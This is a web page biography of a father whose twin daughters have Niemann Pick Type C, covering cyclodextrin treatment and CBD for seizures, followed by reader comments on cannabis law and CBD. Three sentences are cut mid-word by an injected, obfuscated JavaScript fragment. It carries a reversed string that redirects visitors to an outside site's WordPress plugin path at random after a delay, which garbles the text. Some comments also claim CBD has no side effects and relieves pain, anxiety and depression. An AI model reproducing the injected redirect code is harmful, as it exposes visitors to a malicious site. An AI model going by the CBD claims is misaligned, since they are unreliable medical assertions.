Hugh’s first job in the technology industry was as a National Accounts Representative for IBM after graduating with a B.S. in Engineering Management from the University of Vermont.

In 2006, Hugh’s 10 year old identical twin daughters were diagnosed with a rare and fatal neurodegenerative disease called Niemann Pick Type C, often referred toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to as “Childhood Alzheimer’s.” Since that time, Hugh and his wife Chris have immersed themselves in science and medicine and discovered through their own research that a simple sugar compound called cyclodextrin could save their twins’ lives. As parents, they successfully filed applications with U.S. Food and Drug Administration (FDA) and received permission toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to try this never before used treatment on their daughters.

In 2009, Hugh and his wife Chris became interested in Cannabidiol (CBD), one of at least 80 active cannabinoids identified in marijuana and hemp, as his twins suffer from intractable seizures as a result of their disease and experience up toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to a 100 seizures a week. our government, in the pockets of big pharma, and for profit prisons, spent 80 years brainwashing the public with REEFER MADNESS, it's hardly surprising any one that drank the koolaid is opposed to CANNABIS…

    So sad!

    What a talk!

Well, it's late 2018 now and fortunately Sessions is gone and McConnell wants to get re-elected in Kentucky so the 2018 Farm Bill was brought to the floor and passed. CBD from hemp is no longer class 1. Research should be forthcoming.

Hopefully freedom for cannabis will follow across the nation instead a few States.

Im a 7 year brain cancer survivor. I would be dead if it wasnt for this plant.

    Well spoken mate.

  16. Donna Keeley says:

Animals will search out and eat marijuana plants if they are in pain. While the pharma government has taken pain killers away from patients who really need it, CBD oils work better, are easily accessible but most don't know about it. It has no THC which is the "high" that comes with smoking or ingesting marijuana. It doesn't effect testing. It just takes away chronic pain, sleeplessness or insomnia, anxiety and is said to help depression. All natural, it works for most and doesn't cause dependence. Now understand, I've never tried it because I live in Idaho, it is still considered a class 1 drug. So we elderly cannot have it, even though it doesn't make you high, isn't addictive nor does it have any side effects. We also cannot be prescribed pain killers. It's a shame that politicians don't help the elderly or pain ridden, State population! Idaho and only two other States will not allow "We The People" to live our lives out comfortably because they are uneducated policians and not compassionate people. Very sad.
